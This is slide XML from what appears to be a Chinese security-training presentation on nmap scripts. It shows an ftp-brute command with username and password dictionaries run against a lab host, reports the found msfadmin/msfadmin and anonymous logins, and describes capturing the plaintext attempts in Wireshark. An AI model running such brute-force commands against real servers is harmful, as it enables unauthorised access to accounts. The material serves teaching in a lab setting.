            <a:xfrm>
              <a:off x="7293331" y="3709982"/>
              <a:ext cx="3396615" cy="306879"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>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100000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>FTP弱密码扫描</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="文本框 573"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293450" y="3377688"/>
              <a:ext cx="868680" cy="368509"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l"/>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>步骤一</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="文本框 574"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6667040" y="3537851"/>
              <a:ext cx="450850" cy="368509"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FFF9E6"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>01</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFF9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="标题 17"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480060" y="713740"/>
            <a:ext cx="3855085" cy="864235"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" sz="4400">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>【项目实施】</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="矩形 4"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-5715" y="127635"/>
            <a:ext cx="367030" cy="388620"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="012D86"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0E2557"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="0"/>
          </a:gra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6" name="矩形 5"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="403860" y="127635"/>
            <a:ext cx="76200" cy="387985"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0070C0"/>
          </a:soli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12" name="文本占位符 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="522605" y="57150"/>
            <a:ext cx="5081905" cy="558165"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1055"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="2955" b="1" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="723265" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2530" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1205230" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2110" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="168783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4pPr>
            <a:lvl5pPr marL="216979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5pPr>
            <a:lvl6pPr marL="26517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6pPr>
            <a:lvl7pPr marL="31343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7pPr>
            <a:lvl8pPr marL="361632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8pPr>
            <a:lvl9pPr marL="409829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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2.3.2 nmap脚本的使用</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" sz="3600" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="106" name="文本框 105"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5243195" y="659448"/>
            <a:ext cx="5080000" cy="1753235"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="304800"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>通过以下命令进行FTP弱密码暴力破解：nmap -p 21 --script=ftp-brute --script-args userdb=./user,passdb=./password 192.168.36.135。其中</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>--script=ftp-brute为指定使用脚本，--script-args userdb=./user,passdb=./password为该脚本的参数。运行结果见下图：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="图片 1"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5243195" y="2412683"/>
            <a:ext cx="5276850" cy="1847850"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="107" name="文本框 106"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5243195" y="4260533"/>
            <a:ext cx="5080000" cy="1198880"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="0" algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>图2-3-7 进行FTP弱密码暴力破解</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" algn="l"/>
            <a:endParaRPr lang="zh-CN" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>通过实验我们找到了匿名账号可登陆，msfadmin账号可登陆，登陆密码为msfadmin。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="8" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="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组合 6"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="479781" y="2216574"/>
            <a:ext cx="4062095" cy="638810"/>
            <a:chOff x="6627851" y="3377688"/>
            <a:chExt cx="4062095" cy="639173"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="矩形: 圆角 27"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6627851" y="3493208"/>
              <a:ext cx="457200" cy="457200"/>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F9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="矩形 8" descr="e7d195523061f1c003d7160bb3852330e69e1b47c664ea0314E9593E18313AD830F940F1AC53C40C0B8B3D93D4DFF44B590F8D4A945ADE53F5D61968231FCAE157B0D7022AA0681C03E9FB4B1E3862D0C13C109685D0C1F9D9ACA5E10B258C1727924FC3FC0E61468152E413AFD3EDAA03A1BA0B768D2D39A9D26D6009DD7E2AED15C90B1EA11F84"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293331" y="3709982"/>
              <a:ext cx="3396615" cy="306879"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>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100000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>FTP弱密码扫描</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="文本框 573"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293450" y="3377688"/>
              <a:ext cx="868680" cy="368509"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l"/>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>步骤一</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="文本框 574"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6667040" y="3537851"/>
              <a:ext cx="450850" cy="368509"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FFF9E6"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>01</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFF9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="标题 17"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480060" y="713740"/>
            <a:ext cx="3855085" cy="864235"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" sz="4400">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>【项目实施】</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="矩形 4"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-5715" y="127635"/>
            <a:ext cx="367030" cy="388620"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="012D86"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0E2557"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="0"/>
          </a:gra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6" name="矩形 5"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="403860" y="127635"/>
            <a:ext cx="76200" cy="387985"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0070C0"/>
          </a:soli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12" name="文本占位符 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="522605" y="57150"/>
            <a:ext cx="5081905" cy="558165"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1055"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="2955" b="1" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="723265" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2530" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1205230" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2110" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="168783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4pPr>
            <a:lvl5pPr marL="216979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5pPr>
            <a:lvl6pPr marL="26517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6pPr>
            <a:lvl7pPr marL="31343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7pPr>
            <a:lvl8pPr marL="361632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8pPr>
            <a:lvl9pPr marL="409829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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2.3.2 nmap脚本的使用</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" sz="3600" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="107" name="文本框 106"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="403860" y="3156585"/>
            <a:ext cx="3152140" cy="1753235"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="304800"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>我们查看一下该爆破过程中的Wireshark抓取到的数据包，由于该登陆过程使用了明文，所以我们可以发现，nmap逐个用户登录的过程，如图2-3-8和图2-3-9所示。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="图片 1"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3642360" y="1941830"/>
            <a:ext cx="4044950" cy="3176270"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="108" name="文本框 107"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3679190" y="5117465"/>
            <a:ext cx="3949065" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="0" algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>图2-3-8 分析Wireshark抓取的数据包</a:t>
            </a:r>
